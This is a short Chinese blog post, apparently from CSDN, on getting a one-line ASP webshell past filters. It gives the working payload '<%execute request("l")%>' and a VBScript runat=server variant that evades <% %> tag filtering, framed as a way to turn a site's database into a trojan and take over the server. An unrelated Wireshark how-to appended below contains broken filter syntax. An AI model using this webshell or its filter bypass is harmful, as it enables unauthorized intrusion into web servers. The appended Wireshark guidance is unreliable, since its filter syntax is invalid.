一句话木马中突破〈%%〉标记过滤

 很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码。

使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。

不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。

这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。

首先:原程序代码是“<%execute request("l")%>", 我们可以把它的标签换下来。

然后改成"<scriptlanguage=VBScript runat=server>execute request("l")</Script>".。

这样就避开了使用〈%%〉,保存为.ASP,程序照样执行,效果是一样的。
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
在Wireshark查找特定的木马文件名及其内容通常涉及到网络抓包分析。Wireshark是一款强大的网络协议分析工具,可以帮助你查看和理解计算机之间的通信。以下是步骤: 1. **启动Wireshark**:首先,你需要捕获数据包。打开Wireshark,选择合适的网络接口(如eth0、Wi-Fi等),然后开始捕获。 2. **过滤数据包**:在顶部菜单栏选择“过滤”>“显示过滤器”,输入相关的关键词。例如,如果你怀疑木马文件名为"trojan.exe",你可以添加过滤条件`tcp.port == 80 and host -eq your_ip_address and "trojan.exe"`(假设木马通过HTTP传输)。这将显示包含指定字符串的所有TCP连接到特定IP地址的请求。 3. **查看上下文**:对于每个匹配的包,点击它以查看详细信息。在这里,你可能会看到文件名部分以及与其关联的数据内容。注意,木马文件内容可能已被加密或进行了编码,需要一定的技术知识去解码。 4. **检查HTTP头和正文**:如果木马是作为HTTP请求的一部分发送的,查看`http.request.body`字段可以找到可能的内容。同样,对于HTTPS,你会在`tls.record.content`找到明文数据。 5. **搜索附件**:有些恶意软件会作为电子邮件或下载附件传播。检查SMTP(邮件)或者FTP(文件传输)相关的数据流,看是否有可疑的附件存在。 6. **确认与分析**:最后,确认发现的信息是否可信,并结合其他安全手段和技术进行进一步分析,以防误报。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值